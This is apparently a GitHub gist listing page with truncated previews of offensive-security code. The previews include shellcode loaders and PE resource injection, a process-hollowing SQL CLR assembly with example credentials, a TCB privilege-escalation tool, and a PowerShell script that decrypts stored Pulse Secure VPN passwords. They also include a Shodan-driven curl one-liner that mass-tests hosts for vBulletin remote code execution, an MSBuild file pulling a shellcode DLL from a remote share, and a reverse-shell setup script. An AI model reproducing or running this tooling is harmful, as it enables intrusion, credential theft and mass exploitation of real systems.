This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <windows.h> | |
void* GetBaseAddressOfKernel32() { | |
void* kernel32BaseAddress = nullptr; | |
__asm { | |
mov rdi, 0xFFFFFFFFFFFFFFFF // Set RDI to -1 | |
inc rdi // Increment RDI to 0 | |
mov rax, 0 // Zero out RAX |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Runtime.CompilerServices; | |
using System.Net; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace Test | |
{ | |
// CCOB IS THE GOAT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* PEResourceInject (C# version for x64) by Wra7h | |
* | |
* Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode. | |
* This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk, | |
* and this implementation will create a backup of the executable in the same directory with a ".bak" extension. | |
* | |
* Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs | |
* Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin> | |
* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// TcbElevation - Authors: @splinter_code and @decoder_it | |
#define SECURITY_WIN32 | |
#include <windows.h> | |
#include <sspi.h> | |
#include <stdio.h> | |
#pragma comment(lib, "Secur32.lib") | |
void EnableTcbPrivilege(BOOL enforceCheck); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs | |
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime | |
using System; | |
using System.Data; | |
using System.Data.SqlClient; | |
using System.Data.SqlTypes; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
using Microsoft.SqlServer.Server; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -AssemblyName System.Security; | |
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
foreach($ive in $ives) { | |
$ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
Write-Host "[+] Checking IVE $($ivename)..." | |
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
# 3 possible value names for password | |
$encrypted = $ive.Password1 | |
if(!$encrypted){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -AssemblyName System.Security; | |
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*' | |
foreach($ive in $ives) { | |
$ivename = $ive.PSPath.split('\')[-1].ToUpper() | |
Write-Host "[+] Checking IVE $($ivename)..." | |
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename) | |
# 3 possible value names for password | |
$encrypted = $ive.Password1 | |
if(!$encrypted){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This is not great... | |
# | |
NAME=Shell | |
TAC=TrustAllCertificates | |
LHOST=10.0.0.254 | |
LPORT=4444 | |
COMMAND='"powershell"' | |
CURDIR=$(pwd) |
NewerOlder